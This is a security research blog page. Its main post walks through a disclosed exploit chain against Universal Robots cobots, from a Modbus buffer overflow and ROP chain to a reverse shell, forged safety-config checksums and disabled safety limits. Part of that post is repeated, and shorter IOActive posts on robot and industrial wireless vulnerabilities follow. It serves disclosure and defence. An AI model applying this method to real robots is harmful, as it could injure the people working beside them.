RESEARCH | August 22, 2017

Exploiting Industrial Collaborative Robots

Traditional industrial robots are boring. Typically, they are autonomous or operate with limited guidance and execute repetitive, programmed tasks in manufacturing and production settings.1 They are often used to perform duties that are dangerous or unsuitable for workers; therefore, they operate in isolation from humans and other valuable machinery.

This is not the case with the latest generation collaborative robots (“cobots”) though. They function with co-workers in shared workspaces while respecting safety standards. This generation of robots works hand-in-hand with humans, assisting them, rather than just performing automated, isolated operations. Cobots can learn movements, “see” through HD cameras, or “hear” through microphones to contribute to business success.

UR5 by Universal Robots2
Baxter by Rethink Robotics3

So cobots present a much more interesting attack surface than traditional industrial robots. But are cobots only limited to industrial applications? NO, they can also be integrated into other settings!

 
The Moley Robotic Kitchen (2xUR10 Arms)4
DARPA’s ALIAS Robot (UR3 Arm)5
Last February, Cesar Cerrudo (@cesarcer) and I published a non-technical paper “Hacking Robots Before Skynet” previewing our research on several home, business, and industrial robots from multiple well-known vendors. We discovered nearly 50 critical security issues. Within the cobot sector, we audited leading robots, including Baxter/Sawyer from Rethink Robotics and UR by Universal Robots.
      Baxter/Sawyer: We found authentication issues, insecure transport in their protocols, default deployment problems, susceptibility to physical attacks, and the usage of ROS, a research framework known to be vulnerable to multiple issues. The major problems we reported appear to have been patched by the company in February 2017.
     UR: We found authentication issues in many of the control protocols, susceptibility to physical attacks, memory corruption vulnerabilities, and insecure communication transport. All of the issues remain unpatched in the latest version (3.4.2.65, May 2017).6

In accordance with IOActive’s responsible disclosure policy we contacted the vendors last January, so they have had ample time to address the vulnerabilities and inform their customers. Our goal is to make cobots more secure and prevent vulnerabilities from being exploited by attackers to cause serious harm to industries, employees, and their surroundings. I truly hope this blog entry moves the collaborative industry forward so we can safely enjoy this and future generations of robots.

In this post, I will discuss how an attacker can chain multiple vulnerabilities in a leading cobot (UR3, UR5, UR10 – Universal Robots) to remotely modify safety settings, violating applicable safety laws and, consequently, causing physical harm to the robot’s surroundings by moving it arbitrarily.

This attack serves as an example of how dangerous these systems can be if they are hacked. Manipulating safety limits and disabling emergency buttons could directly threaten human life. Imagine what could happen if an attack targeted an array of 64 cobots as is found in a Chinese industrial corporation.7

The final exploit abuses six vulnerabilities to change safety limits and disable safety planes and emergency buttons/sensors remotely over the network. The cobot arm swings wildly about, wreaking havoc. This video demonstrates the attack: https://www.youtube.com/watch?v=cNVZF7ZhE-8

Q: Can these robots really harm a person?
A: Yes, a study8 by the Control and Robotics Laboratory at the École de technologie supérieure (ÉTS) in Montreal (Canada) clearly shows that even the smaller UR5 model is powerful enough to seriously harm a person. While running at slow speeds, their force is more than sufficient to cause a skull fracture.9Q: Wait…don’t they have safety features that prevent them from harming nearby humans?
A: Yes, but they can be hacked remotely, and I will show you how in the next technical section.Q: Where are these deployed?
A: All over the world, in multiple production environments every day.10Integrators Define All Safety Settings

Universal Robots is the manufacturer of UR robots. The company that installs UR robots in a specific application is the integrator. Only an integrated and installed robot is considered a complete machine. The integrators of UR robots are responsible for ensuring that any significant hazard in the entire robot system is eliminated. This includes, but is not limited to:11

  • Conducting a risk assessment of the entire system. In many countries this is required by law
  • Interfacing other machines and additional safety devices if deemed appropriate by the risk assessment
  • Setting up the appropriate safety settings in the Polyscope software (control panel)
  • Ensuring that the user will not modify any safety measures by using a “safety password.
  • Validating that the entire system is designed and installed correctly

Universal Robots has recognized potentially significant hazards, which must be considered by the integrator, for example:

  • Penetration of skin by sharp edges and sharp points on tools or tool connectors
  • Penetration of skin by sharp edges and sharp points on obstacles near the robot track
  • Bruising due to stroke from the robot
  • Sprain or bone fracture due to strokes between a heavy payload and a hard surface
  • Mistakes due to unauthorized changes to the safety configuration parameters

Some safety-related features are purposely designed for cobot applications. These features are particularly relevant when addressing specific areas in the risk assessment conducted by the integrator, including:

  • Force and power limiting: Used to reduce clamping forces and pressures exerted by the robot in the direction of movement in case of collisions between the robot and operator.
  • Momentum limiting: Used to reduce high-transient energy and impact forces in case of collisions between robot and operator by reducing the speed of the robot.
  • Tool orientation limiting: Used to reduce the risk associated with specific areas and features of the tool and work-piece (e.g., to avoid sharp edges to be pointed towards the operator).
  • Speed limitation: Used to ensure the robot arm operates a low speed.
  • Safety boundaries: Used to restrict the workspace of the robot by forcing it to stay on the correct side of defined virtual planes and not pass through them.

Safety planes in action12


Safety I/O: When this input safety function is triggered (via emergency buttons, sensors, etc.), a low signal is sent to the inputs and causes the safety system to transition to “reduced” mode.

Safety scanner13
Safety settings are effective in preventing many potential incidents. But what could happen if malicious actors targeted these measures in order to threaten human life?
Statement from the UR User Guide

Changing Safety Configurations Remotely

“The safety configuration settings shall only be changed in compliance with the risk assessment conducted by the integrator.14 If any safety parameter is changed the complete robot system shall be considered new, meaning that the overall safety approval process, including risk assessment, shall be updated accordingly.”
 

The exploitation process to remotely change the safety configuration is as follows:

Step 1.    Confirm the remote version by exploiting an authentication issue on the UR Dashboard Server.
Step 2.    Exploit a stack-based buffer overflow in UR Modbus TCP service, and execute commands as root.
Step 3.    Modify the safety.conf file. This file overrides all safety general limits, joints limits, boundaries, and safety I/O values.
Step 4.    Force a collision in the checksum calculation, and upload the new file. We need to fake this number since integrators are likely to write a note with the current checksum value on the hardware, as this is a common best practice.
Step 5.    Restart the robot so the safety configurations are updated by the new file. This should be done silently.
Step 6.    Move the robot in an arbitrary, dangerous manner by exploiting an authentication issue on the UR control service.

By analyzing and reverse engineering the firmware image ursys-CB3.1-3.3.4-310.img, I was able to understand the robot’s entry points and the services that allow other machines on the network to interact with the operating system. For this demo I used the URSim simulator provided by the vendor with the real core binary from the robot image. I was able to create modified versions of this binary to run partially on a standard Linux machine, even though it was clearer to use the simulator for this example exploit.

Different network services are exposed in the URControl core binary, and most of the proprietary protocols do not implement strong authentication mechanisms. For example, any user on the network can issue a command to one of these services and obtain the remote version of the running process (Step 1):


Now that I have verified the remote target is running a vulnerable image, ursys-CB3.1-3.3.4-310 (UR3, UR5 or UR10), I exploit a network service to compromise the robot (Step 2).The UR Modbus TCP service (port 502) does not provide authentication of the source of a command; therefore, an adversary could corrupt the robot in a state that negatively affects the process being controlled. An attacker with IP connectivity to the robot can issue Modbus read/write requests and partially change the state of the robot or send requests to actuators to change the state of the joints being controlled.It was not possible to change any safety settings by sending Modbus write requests; however, a stack-based buffer overflow was found in the UR Modbus TCP receiver (inside the URControl core binary).A stack buffer overflows with the recv function, because it uses a user-controlled buffer size to determine how many bytes from the socket will be copied there. This is a very common issue.

Before proceeding with the exploit, let’s review the exploit mitigations in place. The robot’s Linux kernel is configured to randomize (randomize_va_space=1 => ASLR) the positions of the stack, virtual dynamic shared object page, and shared memory regions. Moreover, this core binary does not allow any of its segments to be both writable and executable due to the “No eXecute” (NX) bit.

While overflowing the destination buffer, we also overflow pointers to the function’s arguments. Before the function returns, these arguments are used in other function calls, so we have to provide these calls with a valid value/structure. Otherwise, we will never reach the end of the function and be able to control the execution flow.

edx+0x2c is dereferenced and used as an argument for the call to 0x82e0c90. The problem appears afterwards when EBX (which is calculated from our previous controlled pointer on EDX) needs to also point to a structure where a file descriptor is obtained and is closed with “close” afterwards.

To choose a static address that might comply with these two requirements, I used the following static region, since all others change due to ASLR.

I wrote some scripts to find a suitable memory address and found 0x83aa1fc to be perfect since it suits both conditions:
      0x83aa1fc+0x2c points to valid memory -> 0x831c00a (“INT32”)
      0x83aa1fc+0x1014 contains 0 (nearly all this region is zeroed)
Now that I have met both conditions, execution can continue to the end of this function, and I get EIP control because the saved register on the stack was overflowed:


At this point, I control most of the registers, so I need to place my shellcode somewhere and redirect the execution flow there. For this, I used returned-oriented programming (ROP), the challenge will be to find enough gadgets to set everything I need for clean and reliable exploitation. Automatic ROP-chain tools did not work well for this binary, so I did it manually.First, I focus on my ultimate goal: to execute a reverse shell that connects to my machine. One key point when building a remote ROP-based exploit in Linux are system calls.Depending on the quality of gadgets that useint instructions I find, I will be able to use primitives such as write or dup2 to reuse the socket that was already created to return a shell or other post-exploitation strategies.In this binary, I only found one int 0x80 instruction. This is used to invoke system calls in Linux on x86. Because this is a one-shot gadget, I can only perform a single system call: I will use the execve system call to execute a program. This int 0x80 instruction requires setting up a register with the system call number (EAX in this case 0xb) and then set a register (EBX) that points to a special structure.This structure contains an array of pointers, each of which points to the arguments of the command to be executed.Because of how this vulnerability is triggered, I cannot use null bytes (0x00) on the request buffer. This is a problem because we need to send commands and arguments and also create an array of pointers that end with a null byte. To overcome this, I send a placeholder, like chunks of 0xFF bytes, and later on I replace them with 0x00 at runtime with ROP.In pseudocode this call would be (calls a TCP Reverse Shell):
 
 
All the controlled data is in the stack, so first I will try to align the stack pointer (ESP) to my largest controlled section (STAGE 1). I divided the largest controlled sections into two stages, since they both can potentially contain many ROP gadgets. 

As seen before, at this point I control EBX and EIP. Next, I have to align ESP to any of the controlled segments so I can start doing ROP.

The following gadget (ROP1 0x8220efa) is used to adjust ESP:

 
 
This way ESP = ESP + EBX – 1 (STAGE 1 address in the stack). This aligns ESP to my STAGE 1 section. EBX should decrease ESP by 0x137 bytes, so I use the number 0xfffffec9 (4294966985) because when adding it to ESP, it wraps around to the desired value.
When the retn instruction of the gadget is executed, ROP gadgets at STAGE 1 start doing their magic. STAGE 1 of the exploit does the following:
  1. Zero out the at the end of the arguments structure. This way the processor will know that EXECVE arguments are only those three pointers.
  2. Save a pointer to our first command of cmd[] in our arguments structure.
  3. Jump to STAGE 2, because I don’t have much space here.
 

STAGE 2 of the exploit does the following:

  1. Zero out the xffxffxffxff at the end of each argument in cmd[].
  2. Save a pointer to the 2nd and 3rd argument of cmd[] in on our arguments structure.
  3. Prepare registers for EXECVE. As seen before, we needed
    1. EBX=*args[]
    2. EDX = 0
    3. EAX=0xb
  4. Call the int 0x80 gadget and execute the reverse shell.
Once the TCP reverse shell payload is executed, a connection is made back to my computer. Now I can execute commands and use sudo to execute commands as root in the robot controller.
 
Safety settings are saved in the safety.conf file (Step 3). Universal Robots implemented a CRC (STM-32) algorithm to provide integrity to this file and save the calculated checksum on disk. This algorithm does not provide any real integrity to the settings, as it is possible to generate collisions or calculate new checksum values for new settings overriding special files on the filesystem. I reversed how this calculation is being made for each safety setting and created an algorithm that replicates it. On the video demo, I did not fake the new CRC value to remain the same (located on top-right of the screen), even though this is possible and easy (Step 4).
 
Before modifying any safety setting on the robot, I setup a process that automatically starts a new instance of the robot controller after 25 seconds with the new settings. This will give me enough time to download, modify, and upload a new safety setting file. The following command sets up a new URControl process. I used Python since it allows me to close all current file descriptors of the running process when forking. Remember that I am forking from the reverse shell object, so I need to create a new process that does not inherit any of the file descriptors so they are closed when the parent URControl process dies (in order to restart and apply new safety settings).
 
 
Now I have 25 seconds to download the current file, modify it, calculate new CRC, reupload it, and kill the running URControl process (which has an older safety settings config). I can programmatically use the kill command to target the current URControl instance (Step 5).
 

Finally, I send this command to the URControl service in order to load the new installation we uploaded. I also close any popup that might appear on the UI.

 
Finally, an attacker can simply call the movej function in the URControl service to move joints remotely, with a custom speed and acceleration (Step 6). This is shown at the end of the video.

Once again, I see novel and expensive technology which is vulnerable and exploitable. A very technical bug, like a buffer overflow in one of the protocols, exposed the integrity of the entire robot system to remote attacks. We reported the complete flow of vulnerabilities to the vendors back in January, and they have yet to be patched.
What are we waiting for?
 
1 https://www.robots.com/faq/show/what-is-an-industrial-robot
2 https://www.roboticsbusinessreview.com/manufacturing/cobot-market-boom-lifts-universal-robots-fortunes-2016/
3 http://www.rethinkrobotics.com/blog/humans-and-collaborative-robots-working-together-in-grand-rapids-mi/ 
https://www.youtube.com/watch?v=G6_LCwu7dOg
4https://www.wired.com/2016/11/darpa-alias-autonomous-aircraft-aurora-sikorsky/
5 https://www.universal-robots.com/how-tos-and-faqs/faq/ur-faq/release-note-software-version-34xx/
6https://www.youtube.com/watch?v=PtncirKiBXQ&t=1s
7http://coro.etsmtl.ca/blog/?p=299
8 http://www.forensicmed.co.uk/pathology/head-injury/skull-fracture/
9https://www.universal-robots.com/case-stories/
11 https://academy.universal-robots.com
12https://academy.universal-robots.com
13Software_Manual_en_US.pdf – Universal Robots

Safety planes in action12


Safety I/O: When this input safety function is triggered (via emergency buttons, sensors, etc.), a low signal is sent to the inputs and causes the safety system to transition to “reduced” mode.

Safety Scanner 13

Safety settings are effective in preventing many potential incidents. But what could happen if malicious actors targeted these measures in order to threaten human life?

Statement from the UR User Guide

Changing Safety Configurations Remotely

“The safety configuration settings shall only be changed in compliance with the risk assessment conducted by the integrator.14 If any safety parameter is changed the complete robot system shall be considered new, meaning that the overall safety approval process, including risk assessment, shall be updated accordingly.”
 

The exploitation process to remotely change the safety configuration is as follows:

Step 1.    Confirm the remote version by exploiting an authentication issue on the UR Dashboard Server.
Step 2.    Exploit a stack-based buffer overflow in UR Modbus TCP service, and execute commands as root.
Step 3.    Modify the safety.conf file. This file overrides all safety general limits, joints limits, boundaries, and safety I/O values.
Step 4.    Force a collision in the checksum calculation, and upload the new file. We need to fake this number since integrators are likely to write a note with the current checksum value on the hardware, as this is a common best practice.
Step 5.    Restart the robot so the safety configurations are updated by the new file. This should be done silently.
Step 6.    Move the robot in an arbitrary, dangerous manner by exploiting an authentication issue on the UR control service.

By analyzing and reverse engineering the firmware image ursys-CB3.1-3.3.4-310.img, I was able to understand the robot’s entry points and the services that allow other machines on the network to interact with the operating system. For this demo I used the URSim simulator provided by the vendor with the real core binary from the robot image. I was able to create modified versions of this binary to run partially on a standard Linux machine, even though it was clearer to use the simulator for this example exploit.

Different network services are exposed in the URControl core binary, and most of the proprietary protocols do not implement strong authentication mechanisms. For example, any user on the network can issue a command to one of these services and obtain the remote version of the running process (Step 1):


Now that I have verified the remote target is running a vulnerable image, ursys-CB3.1-3.3.4-310 (UR3, UR5 or UR10), I exploit a network service to compromise the robot (Step 2).The UR Modbus TCP service (port 502) does not provide authentication of the source of a command; therefore, an adversary could corrupt the robot in a state that negatively affects the process being controlled. An attacker with IP connectivity to the robot can issue Modbus read/write requests and partially change the state of the robot or send requests to actuators to change the state of the joints being controlled.It was not possible to change any safety settings by sending Modbus write requests; however, a stack-based buffer overflow was found in the UR Modbus TCP receiver (inside the URControl core binary).A stack buffer overflows with the recv function, because it uses a user-controlled buffer size to determine how many bytes from the socket will be copied there. This is a very common issue.

Before proceeding with the exploit, let’s review the exploit mitigations in place. The robot’s Linux kernel is configured to randomize (randomize_va_space=1 => ASLR) the positions of the stack, virtual dynamic shared object page, and shared memory regions. Moreover, this core binary does not allow any of its segments to be both writable and executable due to the “No eXecute” (NX) bit.

While overflowing the destination buffer, we also overflow pointers to the function’s arguments. Before the function returns, these arguments are used in other function calls, so we have to provide these calls with a valid value/structure. Otherwise, we will never reach the end of the function and be able to control the execution flow.

edx+0x2c is dereferenced and used as an argument for the call to 0x82e0c90. The problem appears afterwards when EBX (which is calculated from our previous controlled pointer on EDX) needs to also point to a structure where a file descriptor is obtained and is closed with “close” afterwards.

To choose a static address that might comply with these two requirements, I used the following static region, since all others change due to ASLR.

I wrote some scripts to find a suitable memory address and found 0x83aa1fc to be perfect since it suits both conditions:
      0x83aa1fc+0x2c points to valid memory -> 0x831c00a (“INT32”)
      0x83aa1fc+0x1014 contains 0 (nearly all this region is zeroed)
Now that I have met both conditions, execution can continue to the end of this function, and I get EIP control because the saved register on the stack was overflowed:

At this point, I control most of the registers, so I need to place my shellcode somewhere and redirect the execution flow there. For this, I used returned-oriented programming (ROP), the challenge will be to find enough gadgets to set everything I need for clean and reliable exploitation. Automatic ROP-chain tools did not work well for this binary, so I did it manually.
 
First, I focus on my ultimate goal: to execute a reverse shell that connects to my machine. One key point when building a remote ROP-based exploit in Linux are system calls. Depending on the quality of gadgets that use int instructions I find, I will be able to use primitives such as write or dup2 to reuse the socket that was already created to return a shell or other post-exploitation strategies.

In this binary, I only found one int 0x80 instruction. This is used to invoke system calls in Linux on x86. Because this is a one-shot gadget, I can only perform a single system call: I will use the execve system call to execute a program. This int 0x80 instruction requires setting up a register with the system call number (EAX in this case 0xb) and then set a register (EBX) that points to a special structure. This structure contains an array of pointers, each of which points to the arguments of the command to be executed.
 
Because of how this vulnerability is triggered, I cannot use null bytes (0x00) on the request buffer. This is a problem because we need to send commands and arguments and also create an array of pointers that end with a null byte. To overcome this, I send a placeholder, like chunks of 0xFF bytes, and later on I replace them with 0x00 at runtime with ROP.
 
In pseudocode this call would be (calls a TCP Reverse Shell):
 
 
All the controlled data is in the stack, so first I will try to align the stack pointer (ESP) to my largest controlled section (STAGE 1). I divided the largest controlled sections into two stages, since they both can potentially contain many ROP gadgets. 

As seen before, at this point I control EBX and EIP. Next, I have to align ESP to any of the controlled segments so I can start doing ROP.
The following gadget (ROP1 0x8220efa) is used to adjust ESP:
 
 
This way ESP = ESP + EBX – 1 (STAGE 1 address in the stack). This aligns ESP to my STAGE 1 section. EBX should decrease ESP by 0x137 bytes, so I use the number 0xfffffec9 (4294966985) because when adding it to ESP, it wraps around to the desired value.
When the retn instruction of the gadget is executed, ROP gadgets at STAGE 1 start doing their magic. STAGE 1 of the exploit does the following:
  1. Zero out the at the end of the arguments structure. This way the processor will know that EXECVE arguments are only those three pointers.
  2. Save a pointer to our first command of cmd[] in our arguments structure.
  3. Jump to STAGE 2, because I don’t have much space here.
 

STAGE 2 of the exploit does the following:

  1. Zero out the xffxffxffxff at the end of each argument in cmd[].
  2. Save a pointer to the 2nd and 3rd argument of cmd[] in on our arguments structure.
  3. Prepare registers for EXECVE. As seen before, we needed
    1. EBX=*args[]
    2. EDX = 0
    3. EAX=0xb
  4. Call the int 0x80 gadget and execute the reverse shell.
Once the TCP reverse shell payload is executed, a connection is made back to my computer. Now I can execute commands and use sudo to execute commands as root in the robot controller.
 
Safety settings are saved in the safety.conf file (Step 3). Universal Robots implemented a CRC (STM-32) algorithm to provide integrity to this file and save the calculated checksum on disk. This algorithm does not provide any real integrity to the settings, as it is possible to generate collisions or calculate new checksum values for new settings overriding special files on the filesystem. I reversed how this calculation is being made for each safety setting and created an algorithm that replicates it. On the video demo, I did not fake the new CRC value to remain the same (located on top-right of the screen), even though this is possible and easy (Step 4).
 
Before modifying any safety setting on the robot, I setup a process that automatically starts a new instance of the robot controller after 25 seconds with the new settings. This will give me enough time to download, modify, and upload a new safety setting file. The following command sets up a new URControl process. I used Python since it allows me to close all current file descriptors of the running process when forking. Remember that I am forking from the reverse shell object, so I need to create a new process that does not inherit any of the file descriptors so they are closed when the parent URControl process dies (in order to restart and apply new safety settings).
 
 
Now I have 25 seconds to download the current file, modify it, calculate new CRC, reupload it, and kill the running URControl process (which has an older safety settings config). I can programmatically use the kill command to target the current URControl instance (Step 5).
 

Finally, I send this command to the URControl service in order to load the new installation we uploaded. I also close any popup that might appear on the UI.

 

Finally, an attacker can simply call the movej function in the URControl service to move joints remotely, with a custom speed and acceleration (Step 6). This is shown at the end of the video.

Once again, I see novel and expensive technology which is vulnerable and exploitable. A very technical bug, like a buffer overflow in one of the protocols, exposed the integrity of the entire robot system to remote attacks. We reported the complete flow of vulnerabilities to the vendors back in January, and they have yet to be patched.

What are we waiting for?

 
1 https://www.robots.com/faq/show/what-is-an-industrial-robot
2 https://www.roboticsbusinessreview.com/manufacturing/cobot-market-boom-lifts-universal-robots-fortunes-2016/
3 http://www.rethinkrobotics.com/blog/humans-and-collaborative-robots-working-together-in-grand-rapids-mi/ 
https://www.youtube.com/watch?v=G6_LCwu7dOg
4https://www.wired.com/2016/11/darpa-alias-autonomous-aircraft-aurora-sikorsky/
5 https://www.universal-robots.com/how-tos-and-faqs/faq/ur-faq/release-note-software-version-34xx/
6https://www.youtube.com/watch?v=PtncirKiBXQ&t=1s
7http://coro.etsmtl.ca/blog/?p=299
8 http://www.forensicmed.co.uk/pathology/head-injury/skull-fracture/
9https://www.universal-robots.com/case-stories/
11 https://academy.universal-robots.com
12https://academy.universal-robots.com
13Software_Manual_en_US.pdf – Universal Robots
RESEARCH | March 1, 2017

Hacking Robots Before Skynet

Robots are going mainstream in both private and public sectors – on military missions, performing surgery, building skyscrapers, assisting customers at stores, as healthcare attendants, as business assistants, and interacting closely with our families in a myriad of ways. Robots are already showing up in many of these roles today, and in the coming years they will become an ever more prominent part of our home and business lives. But similar to other new technologies, recent IOActive research has found robotic technologies to be highly insecure in a variety of ways that could pose serious threats to the people and organizations they operate in and around.
 
This blog post is intended to provide a brief overview of the full paper we’ve published based on this research, in which we discovered critical cybersecurity issues in several robots from multiple vendors. The goal is to make robots more secure and prevent vulnerabilities from being used maliciously by attackers to cause serious harm to businesses, consumers, and their surroundings. The paper contains more information about the research, findings, and cites many sources used in compiling the information presented in the paper and this post.
 
Robot Adoption and Cybersecurity
Robots are already showing up in thousands of homes and businesses. As many of these “smart” machines are self-propelled, it is important that they’re secure, well protected, and not easy to hack. If not, instead of helpful resources they could quickly become dangerous tools capable of wreaking havoc and causing substantive harm to their surroundings and the humans they’re designed to serve.
 
We’re already experiencing some of the consequences of substantial cybersecurity problems with Internet of Things (IoT) devices that are impacting the Internet, companies and commerce, and individual consumers alike. Cybersecurity problems in robots could have a much greater impact. When you think of robots as computers with arms, legs, or wheels, they become kinetic IoT devices that, if hacked, can pose new serious threats we have never encountered before.
 
With this in mind, we decided to attempt to hack some of the more popular home, business, and industrial robots currently available on the market. Our goal was to assess the cybersecurity of current robots and determine potential consequences of possible cyberattacks. Our results show how insecure and susceptible current robot technology is to cyberattacks, confirming our initial suspicions.
 
Cybersecurity Problems in Today’s Robots
We used our expertise in hacking computers and embedded devices to build a foundation of practical cyberattacks against robot ecosystems. A robot ecosystem is usually composed of the physical robot, an operating system, firmware, software, mobile/remote control applications, vendor Internet services, cloud services, networks, etc. The full ecosystem presents a huge attack surface with numerous options for cyberattacks.
 
We applied risk assessment and threat modeling tools to robot ecosystems to support our research efforts, allowing us to prioritize the critical and high cybersecurity risks for the robots we tested. We focused on assessing the most accessible components of robot ecosystems, such as mobile applications, operating systems, firmware images, and software. Although we didn’t have all the physical robots, it didn’t impact our research results. We had access to the core components, which provide most of the functionality for the robots; we could say these components “bring them to life.”
 
Our research covered home, business, and industrial robots, as well as the control software used by several other robots. The specific robot vendors evaluated in the research are identified in the published research paper.
 
We found nearly 50 cybersecurity vulnerabilities in the robot ecosystem components, many of which were common problems. While this may seem like a substantial number, it’s important to note that our testing was not even a deep, extensive security audit, as that would have taken a much larger investment of time and resources. The goal for this work was to gain a high level sense of how insecure today’s robots are, which we accomplished. We will continue researching this space and go deeper in future projects.
 
An explanation of each main cybersecurity issue discovered is available in the published research paper, but the following is a high-level (non-technical) list of what we found:
·         Insecure Communications
·         Authentication Issues
·         Missing Authorization
·         Weak Cryptography
·         Privacy Issues
·         Weak Default Configuration
·         Vulnerable Open Source Robot Frameworks and Libraries
 
We observed a broad problem in the robotics community: researchers and enthusiasts use the same – or very similar – tools, software, and design practices worldwide. For example, it is common for robots born as research projects to become commercial products with no additional cybersecurity protections; the security posture of the final product remains the same as the research or prototype robot. This practice results in poor cybersecurity defenses, since research and prototype robots are often designed and built with few or no protections. This lack of cybersecurity in commercial robots was clearly evident in our research.
 
Cyberattacks on Robots

Our research uncovered both critical- and high-risk cybersecurity problems in many robot features. Some of them could be directly abused, and others introduced severe threats. Examples of some of the common robot features identified in the research as possible attack threats are as follows:

  • Microphones and Cameras
  • External Services Interaction
  • Remote Control Applications
  • Modular Extensibility
  • Network Advertisement
  • Connection Ports
A full list with descriptions for each is available in the published paper.
 
New technologies are typically prone to security problems, as vendors prioritize time-to-market over security testing. We have seen vendors struggling with a growing number of cybersecurity issues in multiple industries where products are growing more connected, including notably IoT and automotive in recent years. This is usually the result of not considering cybersecurity at the beginning of the product lifecycle; fixing vulnerabilities becomes more complex and expensive after a product is released.
 
The full paper provides an overview of the many implications of insecure robots as they become more prominent in home, business, industry, healthcare, and other applications. We’ve also included many recommendations in the paper for ways to design and build robotic technology more securely based on our findings.
 
Click here for more information on the research and to view the full paper for additional details and descriptions.   
RESEARCH | July 2, 2015

Hacking Wireless Ghosts Vulnerable For Years

Is the risk associated to a Remote Code Execution vulnerability in an industrial plant the same when it affects the human life? When calculating risk, certain variables and metrics are combined into equations that are rendered as static numbers, so that risk remediation efforts can be prioritized. But such calculations sometimes ignore the environmental metrics and rely exclusively on exploitability and impact. The practice of scoring vulnerabilities without auditing the potential for collateral damage could underestimate a cyber attack that affects human safety in an industrial plant and leads to catastrophic damage or loss. These deceiving scores are always attractive for attackers since lower-priority security issues are less likely to be resolved on time with a quality remediation.

In the last few years, the world has witnessed advanced cyber attacks against industrial components using complex and expensive malware engineering. Today the lack of entry points for hacking an isolated process inside an industrial plant mean that attacks require a combination of zero-day vulnerabilities and more money.

Two years ago, Carlos Mario Penagos (@binarymantis) and I (Lucas Apa) realized that the most valuable entry point for an attacker is in the air. Radio frequencies leak out of a plant’s perimeter through the high-power antennas that interconnect field devices. Communicating with the target devices from a distance is priceless because it allows an attack to be totally untraceable and frequently unstoppable.

In August 2013 at Black Hat Briefings, we reported multiple vulnerabilities in the industrial wireless products of three vendors and presented our findings. We censored vendor names from our paper to protect the customers who use these products, primarily nuclear, oil and gas, refining, petro-chemical, utility, and wastewater companies mostly based in North America, Latin America, India, and the Middle East (Bahrain, Kuwait, Oman, Qatar, Saudi Arabia, and UAE). These companies have trusted expensive but vulnerable wireless sensors to bridge the gap between the physical and digital worlds.

First, we decided to target wireless transmitters (sensors). These sensors gather the physical, real-world values used to monitor conditions, including liquid level, pressure, flow, and temperature. These values are precise enough to be trusted by all of the industrial hardware and machinery in the field. Crucial decisions are based on these numbers. We also targeted wireless gateways, which collect this information and communicate it to the backbone SCADA systems (RTU/EFM/PLC/HMI).

In June 2013, we reported eight different vulnerabilities to the ICS-CERT (Department of Homeland Security). Three months later, one of the vendors, ProSoft Technology released a patch to mitigate a single vulnerability.

After a patient year, IOActive Labs in 2014 released an advisory titled “OleumTech Wireless Sensor Network Vulnerabilities” describing four vulnerabilities that could lead to process compromise, public damage, and employee safety, potentially leading to the loss of life.

Figure 1: OleumTech Transmitters infield

The following OleumTech Products are affected:

  • All OleumTech Wireless Gateways: WIO DH2 and Base Unit (RFv1 Protocol)
  • All OleumTech Transmitters and Wireless Modules (RFv1 Protocol)
  • BreeZ v4.3.1.166

An untrusted user or group within a 40-mile range could inject false values on the wireless gateways in order to modify measurements used to make critical decisions. In the following video demonstration, an attacker makes a chemical react and explode by targeting a wireless transmitter that monitors the process temperature. This was possible because a proper failsafe mechanism had not been implemented and physical controls failed. Heavy machinery makes crucial decisions based on the false readings; this could give the attacker control over part of the process.

Figure 2: OleumTech DH2 used as the primary Wireless Gateway to collect wireless end node data.
Video:  Attack launched using a 40 USD RF transceiver and antenna

Industrial embedded systems’ vulnerabilities that can be exploited remotely without needing any internal access are inherently appealing for terrorists.

Mounting a destructive, real-world attack in these conditions is possible. These products are in commercial use in industrial plants all over the world. As if causing unexpected chemical reactions is not enough, exploiting a remote, wireless memory corruption vulnerability could shut down the sensor network of an entire facility for an undetermined period of time.

In May 2015, two years from the initial private vulnerability disclosure, OleumTech created an updated RF protocol version (RFv2) that seems to allow users to encrypt their wireless traffic with AES256. Firmware for all products was updated to support this new feature.

Still, are OleumTech customers aware of how the new AES Encryption key is generated? Which encryption key is the network using?

Figure 3: Picture from OleumTech BreeZ 5 – Default Values (AES Encryption)

Since every hardware device should be unmounted from the field location for a manual update, what is the cost?

IOActive Labs hasn’t tested these firmware updates. We hope that OleumTech’s technical team performed testing to ensure that the firmware is properly securing radio communications.

I am proud that IOActive has one of the largest professional teams of information security researchers who work with ICS-CERT (DHS) in the world. In addition to identifying critical vulnerabilities and threats for power system facilities, the IOActive team provides security testing directly for control system manufacturers and businesses that have industrial facilities – proactively detecting weaknesses and anticipating exploits in order to improve the safety and operational integrity of technologies.

Needless to say, the companies that rely on vulnerable devices could lose much more than millions of dollars if these vulnerabilities are exploited. These flaws have the potential for massive economic and sociological impact, as well as loss of human life. On the other hand, some attacks are undetectable so it is possible that some of these devices already have been exploited in the wild. We may never know. Fortunately, customers now have a stronger security model and I expect that they now are motivated enough to get involved and ask the vulnerable vendors these open questions.

INSIGHTS | October 22, 2013

NCSAM – Lucas Apa explains the effects of games cheating, 3D modeling, and psychedelic trance music on IT security

I got involved with computers in 1994 when I was six years old. I played games for some years without even thinking about working in the security field. My first contact with the security field was when I started to create “trainers” to cheat on games by manipulating their memory. This led me to find many tutorials related to assembly and cracking in 2001, when my security research began.

The thin line of legality at that time was blurred by actions not considered illegal. This allowed an explosion of hacking groups, material, and magazines. Many of the hacking techniques that still prevail today started in the early century. At that time I lacked good programming skills and an Internet connection in my homeland, Argentina. I got interested in packers and solved many crackmes because I wondered how commercial games built anti-cracking protections. At that time pirated games were heavily distributed in my country. Having some experience with debuggers allowed me to quickly learn the foundations of programming languages. Many years of self-education and a soon to finish computer engineering degree finally gave me sufficient insight to comprehend how modern software works.

When I was a teenager, I also had the opportunity to explore other areas related to computers, such as 3D modeling (animated short films) and producing psychedelic trance music. All these artistic and creative expressions help me appraise and seize an opportunity, especially when seeing how a new exploitation technique works or providing a new innovative solution or approach to a problem.

There was a moment that I realized the serious effort and true thirst I needed to achieve what could be impossible for other people. The security industry is highly competitive, and it sometimes requires extreme skills to provide a comprehensive response or a novel methodology for doing things. The battle between offensive and defensive security has always been entertaining, pushing the barrier of imagination and creativity every time. This awakens true passion in the people who like being part of this game. Every position is important, and the most interesting part is that both sides are convinced that their decisions are right and accurate.

